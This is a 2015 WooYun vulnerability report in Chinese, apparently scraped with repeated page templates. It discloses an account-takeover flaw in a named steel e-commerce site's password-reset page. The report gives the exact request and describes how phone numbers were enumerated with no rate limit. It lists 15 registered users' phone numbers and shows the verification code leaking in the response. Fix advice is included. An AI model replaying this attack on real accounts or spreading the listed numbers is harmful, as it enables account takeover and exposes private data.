某钢材电商平台任意帐号密码重置 | wooyun-2015-0107214| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0107214

漏洞标题：某钢材电商平台任意帐号密码重置

漏洞作者：江湖

提交时间：2015-04-13 11:10

修复时间：2015-05-28 11:12

公开时间：2015-05-28 11:12

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-13：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-05-28：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

某钢材电商平台任意帐号密码重置

详细说明：

找回密码页面
http://i.steelcn.cn/passport/password.aspx
开始抓包，在手机号档输入手机号，点击“点击获取六位验证码”。如手机号没有注册，响应内容为2。
请求包：

GET /passport/password.aspx?action=ajax&userid=&mobile=13007500223&t=142812345678 HTTP/1.1
Host: i.steelcn.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://i.steelcn.cn/passport/password.aspx
Cookie: ASP.NET_SessionId=azeaysnopyqvoq2nlpp3pg3m
Connection: keep-alive

响应包：

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 10 Apr 2015 15:15:14 GMT
Content-Length: 6
2

经测试，程序并没有限制对请求IP做单位时间请求的限制，可以进行爆破。用工具生成了一个手机号字典。跑了一会时间，得到几个已注册的手机号。

13007500223
13007500623
13007502047
13007512660
13007513464
13007516004
13007521899
13007539739
13007547919
13007600578
13007601857
13007605518
13007605617
13007610355
13007616780

并且，在已注册的手机号请求包的响应包中，直接可以看到验证码。

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 10 Apr 2015 15:15:14 GMT
Content-Length: 6
480599

重新用爆出的手机号发请求，抓包，然后用响应中的验证码登录。成功进入。

漏洞证明：

修复方案：

1.应限制单位时间同一IP尝试注册手机号的请求。
2.响应不应该包含了验证码内容。
修复方案，参考参考http://drops.wooyun.org/papers/2035

版权声明：转载请注明来源江湖@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

漏洞评价：

2015-05-28 13:38 | llkoio ( 路人 | Rank:20 漏洞数:3 | 热爱网络安全！)

为啥响应包要包含验证码呢？不是应该发给手机吗？怎么还要返给浏览器呢？
2015-05-28 22:29 | 江湖 ( 实习白帽子 | Rank:38 漏洞数:6 | 一入江湖岁月催！)

所以很奇葩呀，很多这一类的找回密码漏洞的。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0107214

漏洞标题：某钢材电商平台任意帐号密码重置

相关厂商：steelcn.cn

漏洞作者：江湖

提交时间：2015-04-13 11:10

修复时间：2015-05-28 11:12

公开时间：2015-05-28 11:12

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源江湖@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0107214

漏洞标题：某钢材电商平台任意帐号密码重置

相关厂商：steelcn.cn

漏洞作者： 江湖

提交时间：2015-04-13 11:10

修复时间：2015-05-28 11:12

公开时间：2015-05-28 11:12

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0107214"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 江湖@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：江湖

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源江湖@乌云